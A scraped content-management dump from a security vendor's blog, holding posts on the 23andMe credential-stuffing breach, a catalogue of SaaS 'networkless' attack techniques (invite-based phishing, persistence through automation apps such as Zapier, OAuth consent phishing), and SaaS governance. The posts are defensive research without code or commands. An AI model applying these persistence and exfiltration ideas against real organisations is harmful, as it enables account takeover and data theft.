2023",{"data":74453,"content":74454,"nodeType":860},{},[74455],{"data":74456,"marks":74457,"value":74458,"nodeType":864},{},[],"Genetic testing provider 23andMe confirmed that hackers downloaded the data of 6.9 million people of the existing 14 million customers after breaching around 14,000 user accounts. ",{"data":74460,"content":74461,"nodeType":860},{},[74462],{"data":74463,"marks":74464,"value":74465,"nodeType":864},{},[],"The attacker stole health reports and raw genotype data of customers affected by a credential stuffing attack that went unnoticed for five months, from April 29 to September 27. ",{"data":74467,"content":74468,"nodeType":860},{},[74469],{"data":74470,"marks":74471,"value":74472,"nodeType":864},{},[],"The credentials used by the attackers to breach the customers' accounts were stolen in other data breaches or used on previously compromised online platforms, and targeted accounts without MFA. ","Tracking identity-based attacks in the wild","To help organizations keep track of how browser-based identity attacks are evolving, we've put together this index of recent breaches.","2024-03-21T00:00:00.000Z","identity-attacks-in-the-wild",{"items":74478},[74479,74481],{"sys":74480,"name":6593},{"id":6592},{"sys":74482,"name":342},{"id":6596},{"items":74484},[74485],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":74486},{"url":2740},"blog/saas-attack-techniques",{"json":74489},{"data":74490,"content":74491,"nodeType":856},{},[74492],{"data":74493,"content":74494,"nodeType":860},{},[74495],{"data":74496,"marks":74497,"value":66799,"nodeType":864},{},[],{"id":66016,"publishedAt":74499},"2026-08-12T11:56:09.096Z",{"items":74501},[74502,74504],{"sys":74503,"name":6593},{"id":6592},{"sys":74505,"name":342},{"id":6596},{"items":74507},[74508,74510,74512,74514,74516,74518,74520,74522,74524,74526,74528,74530,74532,74534],{"sys":74509,"name":279,"slug":280,"tier":31},{"id":276},{"sys":74511,"name":413,"slug":414,"tier":31},{"id":410},{"sys":74513,"name":545,"slug":546,"tier":31},{"id":542},{"sys":74515,"name":642,"slug":643,"tier":31},{"id":639},{"sys":74517,"name":342,"slug":343,"tier":31},{"id":339},{"sys":74519,"name":404,"slug":405,"tier":45},{"id":401},{"sys":74521,"name":484,"slug":485,"tier":45},{"id":481},{"sys":74523,"name":324,"slug":325,"tier":45},{"id":321},{"sys":74525,"name":333,"slug":334,"tier":45},{"id":330},{"sys":74527,"name":395,"slug":396,"tier":45},{"id":392},{"sys":74529,"name":607,"slug":608,"tier":45},{"id":604},{"sys":74531,"name":431,"slug":432,"tier":45},{"id":428},{"sys":74533,"name":377,"slug":378,"tier":45},{"id":374},{"sys":74535,"name":475,"slug":476,"tier":45},{"id":472},"0szC1VTC1eFfVaNqA8iSM9qG0Z5QA_j3akEjwUCQQ5M",{"id":74538,"title":74539,"authorsCollection":74540,"content":74548,"extension":228,"faqItemsCollection":75222,"faqTitle":59,"featured":6,"hashTags":59,"meta":75224,"metaTitle":75225,"ogImage":59,"postType":13349,"publishedDate":75226,"relatedBlogPostsCollection":75227,"slug":75903,"stem":75904,"subtitle":59,"summary":75905,"synopsis":75916,"sys":75917,"tagsCollection":75920,"topicsCollection":75926,"__hash__":75956},"blog/blog/embrace-saas-to-move-faster-than-your-competitors.json","Embrace SaaS to move faster than your competitors",{"items":74541},[74542],{"fullName":74543,"firstName":74544,"jobTitle":74545,"socialLinks":59,"profilePicture":74546},"Sally Soulliere","Sally","Head of Brand & Content",{"url":74547},"https://images.ctfassets.net/y1cdw1ablpvd/7Gh4SbbEj6Zsbd6OzGto8Q/885041a4ddeccc5ef3045c0e22975ef4/T016S22KZ96-U036FPETQRH-330f87708d26-192.jpeg",{"json":74549,"links":75217},{"data":74550,"content":74551,"nodeType":856},{},[74552,74559,74566,74572,74579,74596,74603,74641,74648,74654,74691,74707,74714,74720,74726,74743,74760,74767,74800,74806,74823,74829,74835,74861,74877,74883,74889,74896,74903,74909,74916,74923,74930,74936,74943,74949,74955,74961,74975,74981,75038,75045,75052,75077,75091,75098,75104,75111,75138,75156,75163,75169,75176,75183,75200],{"data":74553,"content":74554,"nodeType":860},{},[74555],{"data":74556,"marks":74557,"value":74558,"nodeType":864},{},[],"Our goal at Push is simple - to reduce the risk of using SaaS apps at work. Doing this well means building controls that are easy to use, easy to understand - and ultimately effective. Not just effective against the hand-wavy concept of “SaaS attacks” but specific techniques –the most common techniques that are likely to cause real damage.",{"data":74560,"content":74561,"nodeType":860},{},[74562],{"data":74563,"marks":74564,"value":74565,"nodeType":864},{},[],"To talk about this, we need to have a shared understanding of what these techniques are. To get that conversation going we’ve pulled together all the techniques we're aware of, and our research team has even added a bunch of new ones.",{"data":74567,"content":74568,"nodeType":1009},{},[74569],{"data":74570,"marks":74571,"value":66055,"nodeType":864},{},[],{"data":74573,"content":74574,"nodeType":860},{},[74575],{"data":74576,"marks":74577,"value":74578,"nodeType":864},{},[],"We’ve taken inspiration from the MITRE ATT&CK framework (certainly intended as the sincerest form of flattery), but wanted to make a conscious break away from the endpoint-focused ATT&CK techniques and instead focus on techniques that are SaaS-specific. In fact, these techniques don’t touch endpoints (so they bypass EDR) or customer networks (so  they bypass network detection) - so we’re calling them networkless attacks.",{"data":74580,"content":74581,"nodeType":860},{},[74582,74586,74593],{"data":74583,"marks":74584,"value":74585,"nodeType":864},{},[],"You can find more detailed descriptions of these techniques (and hopefully PR’s for some we missed) on ",{"data":74587,"content":74588,"nodeType":883},{"uri":6418},[74589],{"data":74590,"marks":74591,"value":6423,"nodeType":864},{},[74592],{"type":1455},{"data":74594,"marks":74595,"value":21,"nodeType":864},{},[],{"data":74597,"content":74598,"nodeType":860},{},[74599],{"data":74600,"marks":74601,"value":74602,"nodeType":864},{},[],"Since we’re not targeting endpoints, let’s talk about the new targets: the accounts/identities on SaaS apps. We found it was useful to not think about these identities as stand-alone isolated islands - they are much more like a graph; less a single web-server on the internet and more like many Windows endpoints on an Active Directory. ",{"data":74604,"content":74605,"nodeType":860},{},[74606,74610,74617,74620,74627,74631,74638],{"data":74607,"marks":74608,"value":74609,"nodeType":864},{},[],"You can leverage this access to an identity on a trusted platform to target (so laterally more or escalate privilege to) other users or identities. For example, attacks like using access to SaaS apps to ",{"data":74611,"content":74612,"nodeType":883},{"uri":48092},[74613],{"data":74614,"marks":74615,"value":66107,"nodeType":864},{},[74616],{"type":1455},{"data":74618,"marks":74619,"value":902,"nodeType":864},{},[],{"data":74621,"content":74622,"nodeType":883},{"uri":57775},[74623],{"data":74624,"marks":74625,"value":66118,"nodeType":864},{},[74626],{"type":1455},{"data":74628,"marks":74629,"value":74630,"nodeType":864},{},[]," to social engineer them there - or perhaps ",{"data":74632,"content":74633,"nodeType":883},{"uri":66125},[74634],{"data":74635,"marks":74636,"value":66131,"nodeType":864},{},[74637],{"type":1455},{"data":74639,"marks":74640,"value":66135,"nodeType":864},{},[],{"data":74642,"content":74643,"nodeType":860},{},[74644],{"data":74645,"marks":74646,"value":74647,"nodeType":864},{},[],"In this case, unusually, it’s not the data in these hundreds of SaaS apps that create risk, and you need to consider low-risk (from a data perspective) apps as a vector to pivot to higher risk apps in your estate.",{"data":74649,"content":74650,"nodeType":1312},{},[74651],{"data":74652,"marks":74653,"value":66149,"nodeType":864},{},[],{"data":74655,"content":74656,"nodeType":860},{},[74657,74660,74667,74670,74677,74681,74688],{"data":74658,"marks":74659,"value":66156,"nodeType":864},{},[],{"data":74661,"content":74662,"nodeType":883},{"uri":66159},[74663],{"data":74664,"marks":74665,"value":66165,"nodeType":864},{},[74666],{"type":1455},{"data":74668,"marks":74669,"value":902,"nodeType":864},{},[],{"data":74671,"content":74672,"nodeType":883},{"uri":66171},[74673],{"data":74674,"marks":74675,"value":66177,"nodeType":864},{},[74676],{"type":1455},{"data":74678,"marks":74679,"value":74680,"nodeType":864},{},[]," that get you initial access to SaaS apps are fairly well known - because they work and are widely used. We’re also starting to see tools and attacks that suggest ",{"data":74682,"content":74683,"nodeType":883},{"uri":57755},[74684],{"data":74685,"marks":74686,"value":66189,"nodeType":864},{},[74687],{"type":1455},{"data":74689,"marks":74690,"value":66193,"nodeType":864},{},[],{"data":74692,"content":74693,"nodeType":860},{},[74694,74697,74704],{"data":74695,"marks":74696,"value":66200,"nodeType":864},{},[],{"data":74698,"content":74699,"nodeType":883},{"uri":58605},[74700],{"data":74701,"marks":74702,"value":66208,"nodeType":864},{},[74703],{"type":1455},{"data":74705,"marks":74706,"value":66212,"nodeType":864},{},[],{"data":74708,"content":74709,"nodeType":860},{},[74710],{"data":74711,"marks":74712,"value":74713,"nodeType":864},{},[],"SaaS apps allow anyone to name app tenants (a.k.a. spaces, teams, or instances) anything they like - including your company name. Attackers send invites to your employees from within the app with a customized message explaining why they should join this new tenant (or sign up to the app if they are not already a user). ",{"data":74715,"content":74716,"nodeType":860},{},[74717],{"data":74718,"marks":74719,"value":66226,"nodeType":864},{},[],{"data":74721,"content":74722,"nodeType":1312},{},[74723],{"data":74724,"marks":74725,"value":66233,"nodeType":864},{},[],{"data":74727,"content":74728,"nodeType":860},{},[74729,74732,74739],{"data":74730,"marks":74731,"value":66240,"nodeType":864},{},[],{"data":74733,"content":74734,"nodeType":883},{"uri":66243},[74735],{"data":74736,"marks":74737,"value":66249,"nodeType":864},{},[74738],{"type":1455},{"data":74740,"marks":74741,"value":74742,"nodeType":864},{},[]," (Living-Off-the-Land Binaries and Scripts), which are often signed Microsoft utilities. Perhaps the most well-known example is executing scripts through PowerShell rather than building custom malware. That isn’t as useful these days but there was a time when PowerShell was routinely used to bypass AV, EDR, and even app allow-listing.",{"data":74744,"content":74745,"nodeType":860},{},[74746,74750,74757],{"data":74747,"marks":74748,"value":74749,"nodeType":864},{},[],"In that same living-off-the-land mindset, an attacker trying to maintain access to each SaaS app they compromise using custom OAuth integration apps, might instead choose to use legit SaaS apps that specialize in workflow automation to create ",{"data":74751,"content":74752,"nodeType":883},{"uri":59957},[74753],{"data":74754,"marks":74755,"value":62172,"nodeType":864},{},[74756],{"type":1455},{"data":74758,"marks":74759,"value":66271,"nodeType":864},{},[],{"data":74761,"content":74762,"nodeType":860},{},[74763],{"data":74764,"marks":74765,"value":74766,"nodeType":864},{},[],"Perhaps the best example here is using a well-known automation app like Zapier, which claims to have more than 5000 integrations. These integrations are often verified, approved, and connected to a trusted vendor (Zapier). An attacker might create workflows to:",{"data":74768,"content":74769,"nodeType":941},{},[74770,74780,74790],{"data":74771,"content":74772,"nodeType":945},{},[74773],{"data":74774,"content":74775,"nodeType":860},{},[74776],{"data":74777,"marks":74778,"value":74779,"nodeType":864},{},[],"do daily data exfiltration from a victim’s data lake",{"data":74781,"content":74782,"nodeType":945},{},[74783],{"data":74784,"content":74785,"nodeType":860},{},[74786],{"data":74787,"marks":74788,"value":74789,"nodeType":864},{},[],"configure a webhook which adds malicious accounts to a github repo on demand",{"data":74791,"content":74792,"nodeType":945},{},[74793],{"data":74794,"content":74795,"nodeType":860},{},[74796],{"data":74797,"marks":74798,"value":74799,"nodeType":864},{},[],"automatically find and replace bank account numbers in emails to the finance team",{"data":74801,"content":74802,"nodeType":860},{},[74803],{"data":74804,"marks":74805,"value":66318,"nodeType":864},{},[],{"data":74807,"content":74808,"nodeType":860},{},[74809,74812,74819],{"data":74810,"marks":74811,"value":66325,"nodeType":864},{},[],{"data":74813,"content":74814,"nodeType":883},{"uri":39722},[74815],{"data":74816,"marks":74817,"value":60979,"nodeType":864},{},[74818],{"type":1455},{"data":74820,"marks":74821,"value":74822,"nodeType":864},{},[]," to make another instance of an existing integration - making this backdoor almost impossible to discover.",{"data":74824,"content":74825,"nodeType":1312},{},[74826],{"data":74827,"marks":74828,"value":66343,"nodeType":864},{},[],{"data":74830,"content":74831,"nodeType":860},{},[74832],{"data":74833,"marks":74834,"value":66350,"nodeType":864},{},[],{"data":74836,"content":74837,"nodeType":860},{},[74838,74841,74848,74851,74858],{"data":74839,"marks":74840,"value":66357,"nodeType":864},{},[],{"data":74842,"content":74843,"nodeType":883},{"uri":66360},[74844],{"data":74845,"marks":74846,"value":66366,"nodeType":864},{},[74847],{"type":1455},{"data":74849,"marks":74850,"value":902,"nodeType":864},{},[],{"data":74852,"content":74853,"nodeType":883},{"uri":19131},[74854],{"data":74855,"marks":74856,"value":19137,"nodeType":864},{},[74857],{"type":1455},{"data":74859,"marks":74860,"value":66380,"nodeType":864},{},[],{"data":74862,"content":74863,"nodeType":860},{},[74864,74867,74874],{"data":74865,"marks":74866,"value":66387,"nodeType":864},{},[],{"data":74868,"content":74869,"nodeType":883},{"uri":66390},[74870],{"data":74871,"marks":74872,"value":66396,"nodeType":864},{},[74873],{"type":1455},{"data":74875,"marks":74876,"value":66400,"nodeType":864},{},[],{"data":74878,"content":74879,"nodeType":860},{},[74880],{"data":74881,"marks":74882,"value":66407,"nodeType":864},{},[],{"data":74884,"content":74885,"nodeType":1009},{},[74886],{"data":74887,"marks":74888,"value":66419,"nodeType":864},{},[],{"data":74890,"content":74891,"nodeType":860},{},[74892],{"data":74893,"marks":74894,"value":74895,"nodeType":864},{},[],"SaaS apps are basically webapps that are run in the cloud and accessed from endpoints, so then WebApp, endpoint, and cloud security should cover all of SaaS, right? ",{"data":74897,"content":74898,"nodeType":860},{},[74899],{"data":74900,"marks":74901,"value":74902,"nodeType":864},{},[],"That was our assumption when we started, but what we found instead was that SaaS marketing  best practices are driving a lot of pretty interesting techniques that you don’t run into in standalone web apps.",{"data":74904,"content":74905,"nodeType":1312},{},[74906],{"data":74907,"marks":74908,"value":66440,"nodeType":864},{},[],{"data":74910,"content":74911,"nodeType":860},{},[74912],{"data":74913,"marks":74914,"value":74915,"nodeType":864},{},[],"Making apps easy to sign-up for and low effort to support means you need to make some interesting choices when it comes to designing account creation and recovery flows. ",{"data":74917,"content":74918,"nodeType":860},{},[74919],{"data":74920,"marks":74921,"value":74922,"nodeType":864},{},[],"Many apps allow users to sign into apps using multiple methods, easily invite collaborators (internal and external) and avoid any additional friction during the sign up process. ",{"data":74924,"content":74925,"nodeType":860},{},[74926],{"data":74927,"marks":74928,"value":74929,"nodeType":864},{},[],"For example, many apps avoid verifying new account email addresses. This is not laziness, these are conscious design choices - not driven by security clearly, but not accidents.",{"data":74931,"content":74932,"nodeType":1312},{},[74933],{"data":74934,"marks":74935,"value":66468,"nodeType":864},{},[],{"data":74937,"content":74938,"nodeType":860},{},[74939],{"data":74940,"marks":74941,"value":74942,"nodeType":864},{},[],"Most SaaS apps are trying to build app marketplaces or perform well in other app’s marketplaces (often both) and it’s rare these days to find apps that don’t integrate with other apps. ",{"data":74944,"content":74945,"nodeType":860},{},[74946],{"data":74947,"marks":74948,"value":66482,"nodeType":864},{},[],{"data":74950,"content":74951,"nodeType":860},{},[74952],{"data":74953,"marks":74954,"value":66489,"nodeType":864},{},[],{"data":74956,"content":74957,"nodeType":1009},{},[74958],{"data":74959,"marks":74960,"value":66496,"nodeType":864},{},[],{"data":74962,"content":74963,"nodeType":860},{},[74964,74968,74972],{"data":74965,"marks":74966,"value":74967,"nodeType":864},{},[],"This research begs one question above others - ",{"data":74969,"marks":74970,"value":66508,"nodeType":864},{},[74971],{"type":2246},{"data":74973,"marks":74974,"value":66512,"nodeType":864},{},[],{"data":74976,"content":74977,"nodeType":1312},{},[74978],{"data":74979,"marks":74980,"value":66519,"nodeType":864},{},[],{"data":74982,"content":74983,"nodeType":860},{},[74984,74988,74995,74998,75005,75008,75015,75018,75025,75028,75035],{"data":74985,"marks":74986,"value":74987,"nodeType":864},{},[],"For some of the better known techniques, like credential stuffing and email phishing, the answer is an easy yes. Stats from ",{"data":74989,"content":74990,"nodeType":883},{"uri":66529},[74991],{"data":74992,"marks":74993,"value":66535,"nodeType":864},{},[74994],{"type":1455},{"data":74996,"marks":74997,"value":902,"nodeType":864},{},[],{"data":74999,"content":75000,"nodeType":883},{"uri":66541},[75001],{"data":75002,"marks":75003,"value":66547,"nodeType":864},{},[75004],{"type":1455},{"data":75006,"marks":75007,"value":66551,"nodeType":864},{},[],{"data":75009,"content":75010,"nodeType":883},{"uri":66554},[75011],{"data":75012,"marks":75013,"value":66560,"nodeType":864},{},[75014],{"type":1455},{"data":75016,"marks":75017,"value":66564,"nodeType":864},{},[],{"data":75019,"content":75020,"nodeType":883},{"uri":19589},[75021],{"data":75022,"marks":75023,"value":66572,"nodeType":864},{},[75024],{"type":1455},{"data":75026,"marks":75027,"value":66576,"nodeType":864},{},[],{"data":75029,"content":75030,"nodeType":883},{"uri":66579},[75031],{"data":75032,"marks":75033,"value":66585,"nodeType":864},{},[75034],{"type":1455},{"data":75036,"marks":75037,"value":66589,"nodeType":864},{},[],{"data":75039,"content":75040,"nodeType":860},{},[75041],{"data":75042,"marks":75043,"value":75044,"nodeType":864},{},[],"The takeaway is that the current focus for defenders should be to ensure users have good phishing-resistant account security in place - make sure you have basics like strong unique passwords and MFA in place across your entire SaaS estate.",{"data":75046,"content":75047,"nodeType":1312},{},[75048],{"data":75049,"marks":75050,"value":75051,"nodeType":864},{},[],"For newer OAuth attacks it’s a lot less clear…",{"data":75053,"content":75054,"nodeType":860},{},[75055,75059,75064,75067,75074],{"data":75056,"marks":75057,"value":75058,"nodeType":864},{},[],"Other techniques like consent phishing, and have been discussed in some breach disclosures like the ",{"data":75060,"marks":75061,"value":75063,"nodeType":864},{},[75062],{"type":1455},"2020 Sans breach",{"data":75065,"marks":75066,"value":66619,"nodeType":864},{},[],{"data":75068,"content":75069,"nodeType":883},{"uri":66622},[75070],{"data":75071,"marks":75072,"value":66628,"nodeType":864},{},[75073],{"type":1455},{"data":75075,"marks":75076,"value":66632,"nodeType":864},{},[],{"data":75078,"content":75079,"nodeType":860},{},[75080,75083,75088],{"data":75081,"marks":75082,"value":66639,"nodeType":864},{},[],{"data":75084,"marks":75085,"value":75087,"nodeType":864},{},[75086],{"type":2246},"either attackers aren’t yet using them widely or they are and we aren’t detecting them",{"data":75089,"marks":75090,"value":2924,"nodeType":864},{},[],{"data":75092,"content":75093,"nodeType":860},{},[75094],{"data":75095,"marks":75096,"value":75097,"nodeType":864},{},[],"There is certainly a case to be made that attackers simply don’t need these newer techniques yet. Many organizations don’t have a way of discovering SaaS use in their organization yet, nevermind breached accounts, so new persistence techniques might be a bit more than necessary at the moment.",{"data":75099,"content":75100,"nodeType":1312},{},[75101],{"data":75102,"marks":75103,"value":66661,"nodeType":864},{},[],{"data":75105,"content":75106,"nodeType":860},{},[75107],{"data":75108,"marks":75109,"value":75110,"nodeType":864},{},[],"On the other hand, there is certainly the possibility that these attacks are increasingly used, but are simply not being discovered. A strong argument in favor of this view is the difficulty in investigating these attacks. Very few SaaS apps provide enough logging capability to discover these attacks as a customer, this is true even for the biggest, most mature apps like Office 365 and Google Workspace unless you are on top license tiers. This is doubly true for attacks that use OAuth, with many apps providing no insight or details into actions made using OAuth-authenticated APIs. ",{"data":75112,"content":75113,"nodeType":860},{},[75114,75117,75124,75128,75135],{"data":75115,"marks":75116,"value":66675,"nodeType":864},{},[],{"data":75118,"content":75119,"nodeType":883},{"uri":66678},[75120],{"data":75121,"marks":75122,"value":66684,"nodeType":864},{},[75123],{"type":1455},{"data":75125,"marks":75126,"value":75127,"nodeType":864},{},[]," relied heavily on Github during the investigation (and in one case even the detection of) their 2022 breaches, and the same  seems true for a similar breach affecting ",{"data":75129,"content":75130,"nodeType":883},{"uri":66691},[75131],{"data":75132,"marks":75133,"value":66697,"nodeType":864},{},[75134],{"type":1455},{"data":75136,"marks":75137,"value":66701,"nodeType":864},{},[],{"data":75139,"content":75140,"nodeType":860},{},[75141,75145,75153],{"data":75142,"marks":75143,"value":75144,"nodeType":864},{},[],"So, are these attacks happening in the real world? My best guess is it’s a little bit of column A and a little bit of column B – there are likely not so many of these attacks happening yet, and when they do I suspect the vast majority go undetected. ",{"data":75146,"content":75147,"nodeType":883},{"uri":66711},[75148],{"data":75149,"marks":75150,"value":66718,"nodeType":864},{},[75151,75152],{"type":1455},{"type":2246},{"data":75154,"marks":75155,"value":21,"nodeType":864},{},[],{"data":75157,"content":75158,"nodeType":860},{},[75159],{"data":75160,"marks":75161,"value":75162,"nodeType":864},{},[],"This is part of the reason we think enabling red-teamers to try these techniques in anger is useful - this is the time-proven way to understand these risks.",{"data":75164,"content":75165,"nodeType":1009},{},[75166],{"data":75167,"marks":75168,"value":66735,"nodeType":864},{},[],{"data":75170,"content":75171,"nodeType":860},{},[75172],{"data":75173,"marks":75174,"value":75175,"nodeType":864},{},[],"We’ve barely scratched the surface, but perhaps there is enough here to get the discussion going. From past experience, discussion may not be enough, and it’s likely that live offensive work like penetration tests or more likely red-team exercises will be required to make the risks of using these techniques real for the wider security community. ",{"data":75177,"content":75178,"nodeType":860},{},[75179],{"data":75180,"marks":75181,"value":75182,"nodeType":864},{},[],"After all, seeing is believing. We think some more practical examples and tools to help red- teamers use these techniques on engagements will help drive awareness forward so we’ll be looking to build out this content.",{"data":75184,"content":75185,"nodeType":860},{},[75186,75189,75197],{"data":75187,"marks":75188,"value":66756,"nodeType":864},{},[],{"data":75190,"content":75191,"nodeType":883},{"uri":66759},[75192],{"data":75193,"marks":75194,"value":75196,"nodeType":864},{},[75195],{"type":1455},"backdoored github repo to get code execution on endpoints",{"data":75198,"marks":75199,"value":2924,"nodeType":864},{},[],{"data":75201,"content":75202,"nodeType":860},{},[75203,75207,75214],{"data":75204,"marks":75205,"value":75206,"nodeType":864},{},[],"Help us all better understand how widespread these attacks are by sharing some war stories - blueteams, have you seen these attacks in IR investigations? Red-teamers, have tried these or similar techniques against SaaS? Even better, we’d love some comments, discussions, or PRs on ",{"data":75208,"content":75209,"nodeType":883},{"uri":6418},[75210],{"data":75211,"marks":75212,"value":6423,"nodeType":864},{},[75213],{"type":1455},{"data":75215,"marks":75216,"value":66786,"nodeType":864},{},[],{"entries":75218},{"hyperlink":75219,"block":75220,"inline":75221},[],[],[],{"items":75223},[],{},"Move faster than competitors by embracing SaaS","2023-04-21T00:00:00.000Z",{"items":75228},[75229,75559],{"__typename":2059,"sys":75230,"content":75232,"title":75541,"synopsis":75542,"hashTags":59,"publishedDate":75543,"slug":75544,"tagsCollection":75545,"authorsCollection":75551},{"id":75231},"2cLFeaDTWWdZ8G8U12qmiZ",{"json":75233},{"data":75234,"content":75235,"nodeType":856},{},[75236,75243,75250,75257,75264,75271,75278,75285,75292,75299,75306,75313,75337,75357,75364,75371,75378,75441,75462,75481,75488,75495,75502,75508,75515,75522],{"data":75237,"content":75238,"nodeType":1009},{},[75239],{"data":75240,"marks":75241,"value":75242,"nodeType":864},{},[],"Prevention isn’t always the answer",{"data":75244,"content":75245,"nodeType":860},{},[75246],{"data":75247,"marks":75248,"value":75249,"nodeType":864},{},[],"As a security team, our job is to help our company achieve its goals by taking risks securely. Simply using a computer represents a risk over the more traditional pen and paper, but the productivity gains clearly outweigh the risk; so the security team ensures the business takes that risk securely. Outright prevention - i.e. not using a computer - in this case, makes no sense.",{"data":75251,"content":75252,"nodeType":860},{},[75253],{"data":75254,"marks":75255,"value":75256,"nodeType":864},{},[],"Of course, within how the computer operates we might choose to prevent some functionality in the name of security, but the principle remains the same - prevention usually requires a trade-off against productivity.",{"data":75258,"content":75259,"nodeType":1009},{},[75260],{"data":75261,"marks":75262,"value":75263,"nodeType":864},{},[],"Detection, but at the cost of privacy",{"data":75265,"content":75266,"nodeType":860},{},[75267],{"data":75268,"marks":75269,"value":75270,"nodeType":864},{},[],"When a base level of security became more common (through better awareness, accessible knowledge, and sensible vendor defaults), attackers shifted to using techniques that couldn’t be prevented because the business relied on the underlying tools - a malicious Word doc, a sneaky PowerShell script, a dodgy PDF.",{"data":75272,"content":75273,"nodeType":860},{},[75274],{"data":75275,"marks":75276,"value":75277,"nodeType":864},{},[],"Now prevention wasn’t an option, the security team had to monitor usage for malicious activity. But monitoring comes at a cost. To detect when malicious activity happens, the security team needs to monitor all activity, including legitimate activity. So, while a detection approach doesn’t restrict what a user can do, it comes at the cost of their privacy.",{"data":75279,"content":75280,"nodeType":1009},{},[75281],{"data":75282,"marks":75283,"value":75284,"nodeType":864},{},[],"Building trust with your users",{"data":75286,"content":75287,"nodeType":860},{},[75288],{"data":75289,"marks":75290,"value":75291,"nodeType":864},{},[],"In either case, when introducing security controls you should aim to justify and explain this decision to your users, remembering that security’s job is to help them do their jobs securely - it shouldn’t be for them to figure out how to do their jobs within the confines of what the security team has decided is OK. A security team should be more like the secret service, than the prison service.",{"data":75293,"content":75294,"nodeType":860},{},[75295],{"data":75296,"marks":75297,"value":75298,"nodeType":864},{},[],"Although, of course, many employees won’t have much interest in the motivations of their IT/security team, maintaining this attitude will help you build and keep trust with them. With trust in hand, employees will be less likely to try to work around your controls.",{"data":75300,"content":75301,"nodeType":1009},{},[75302],{"data":75303,"marks":75304,"value":75305,"nodeType":864},{},[],"SaaS - the new frontier",{"data":75307,"content":75308,"nodeType":860},{},[75309],{"data":75310,"marks":75311,"value":75312,"nodeType":864},{},[],"In recent years, our computers are mostly just windows to the Internet - many users access their email, video conferencing, productivity suites and more via their browser (or Electron apps pretending they aren’t browsers).",{"data":75314,"content":75315,"nodeType":860},{},[75316,75320,75325,75329,75333],{"data":75317,"marks":75318,"value":75319,"nodeType":864},{},[],"And, as is often the way, we’re relearning the same lessons as before. Should employees be ",{"data":75321,"marks":75322,"value":75324,"nodeType":864},{},[75323],{"type":2246},"allowed",{"data":75326,"marks":75327,"value":75328,"nodeType":864},{},[]," to sign up for and use arbitrary SaaS platforms? Should employees be ",{"data":75330,"marks":75331,"value":75324,"nodeType":864},{},[75332],{"type":2246},{"data":75334,"marks":75335,"value":75336,"nodeType":864},{},[]," to add arbitrary apps into Microsoft 365, Google Workspace, or other SaaS platforms?",{"data":75338,"content":75339,"nodeType":860},{},[75340,75344,75353],{"data":75341,"marks":75342,"value":75343,"nodeType":864},{},[],"Regardless of your answer, your coworkers have already spoken and it’s almost certainly already happening. A ",{"data":75345,"content":75347,"nodeType":883},{"uri":75346},"https://track.g2.com/resources/shadow-it-statistics",[75348],{"data":75349,"marks":75350,"value":75352,"nodeType":864},{},[75351],{"type":1455},"report from G2",{"data":75354,"marks":75355,"value":75356,"nodeType":864},{},[]," stated that 80% of workers admit to using SaaS applications at work without getting approval from IT. If you want to enable your colleagues’ productivity, prevention, it would seem, isn’t an option.",{"data":75358,"content":75359,"nodeType":1009},{},[75360],{"data":75361,"marks":75362,"value":75363,"nodeType":864},{},[],"The risks of SaaS",{"data":75365,"content":75366,"nodeType":860},{},[75367],{"data":75368,"marks":75369,"value":75370,"nodeType":864},{},[],"So how do we secure the company in this new way of working? We still have plenty to consider.",{"data":75372,"content":75373,"nodeType":860},{},[75374],{"data":75375,"marks":75376,"value":75377,"nodeType":864},{},[],"We can start thinking about SaaS not just as an allow or not to allow, but taking a more flexible and pragmatic approach, asking questions like::",{"data":75379,"content":75380,"nodeType":941},{},[75381,75391,75401,75411,75421,75431],{"data":75382,"content":75383,"nodeType":945},{},[75384],{"data":75385,"content":75386,"nodeType":860},{},[75387],{"data":75388,"marks":75389,"value":75390,"nodeType":864},{},[],"What kind of data users are entering into these third-party platforms?",{"data":75392,"content":75393,"nodeType":945},{},[75394],{"data":75395,"content":75396,"nodeType":860},{},[75397],{"data":75398,"marks":75399,"value":75400,"nodeType":864},{},[],"How much do we trust the controls the third-party has in place?",{"data":75402,"content":75403,"nodeType":945},{},[75404],{"data":75405,"content":75406,"nodeType":860},{},[75407],{"data":75408,"marks":75409,"value":75410,"nodeType":864},{},[],"Are those controls appropriate for the data? ",{"data":75412,"content":75413,"nodeType":945},{},[75414],{"data":75415,"content":75416,"nodeType":860},{},[75417],{"data":75418,"marks":75419,"value":75420,"nodeType":864},{},[],"Is this platform redundant with the other services we use (e.g. “we use Google Drive, not Dropbox”)? ",{"data":75422,"content":75423,"nodeType":945},{},[75424],{"data":75425,"content":75426,"nodeType":860},{},[75427],{"data":75428,"marks":75429,"value":75430,"nodeType":864},{},[],"Does IT or security need to manage accounts for joiners/leavers?",{"data":75432,"content":75433,"nodeType":945},{},[75434],{"data":75435,"content":75436,"nodeType":860},{},[75437],{"data":75438,"marks":75439,"value":75440,"nodeType":864},{},[],"Does this platform impact our compliance? (e.g. does storing this data on this platform compromise our GDPR status?)",{"data":75442,"content":75443,"nodeType":860},{},[75444,75448,75458],{"data":75445,"marks":75446,"value":75447,"nodeType":864},{},[],"No one said it would be easy 🙃 and it’s easy to see why many organizations initially opt to simply try to block users from using such systems. Assessing each application can be daunting using traditional third-party security assessment techniques - we’ve written a ",{"data":75449,"content":75453,"nodeType":57700},{"target":75450},{"sys":75451},{"id":75452,"type":1001,"linkType":1002},"3PqX7fLrTIYhWjbEhHSRHG",[75454],{"data":75455,"marks":75456,"value":75457,"nodeType":864},{},[],"short guide",{"data":75459,"marks":75460,"value":75461,"nodeType":864},{},[]," on how to approach security auditing in a world of SaaS, which you might find useful.",{"data":75463,"content":75464,"nodeType":860},{},[75465,75469,75477],{"data":75466,"marks":75467,"value":75468,"nodeType":864},{},[],"But the first step in managing this new world is through visibility. Knowing the problem is half the battle and we published ",{"data":75470,"content":75472,"nodeType":883},{"uri":75471},"https://pushsecurity.com/blog/rolling-your-own-saas-discovery/",[75473],{"data":75474,"marks":75475,"value":75476,"nodeType":864},{},[],"an article",{"data":75478,"marks":75479,"value":75480,"nodeType":864},{},[]," about how to manually find the SaaS apps your employees are using. The problem is, a lot of them are either error-prone or quite invasive, potentially collecting your users private activity. In the trade-off of security versus privacy, we think that’s a bit too far and will likely damage the trust you’ve built with your coworkers.",{"data":75482,"content":75483,"nodeType":1009},{},[75484],{"data":75485,"marks":75486,"value":75487,"nodeType":864},{},[],"Monitoring SaaS use without compromising privacy",{"data":75489,"content":75490,"nodeType":860},{},[75491],{"data":75492,"marks":75493,"value":75494,"nodeType":864},{},[],"Our approach at Push is to deploy our browser extension to our users’ browsers which is configured with the domains we use for work (e.g. @pushsecurity.com). The browser extension only monitors logins where an @pushsecurity.com email address is used, which we can 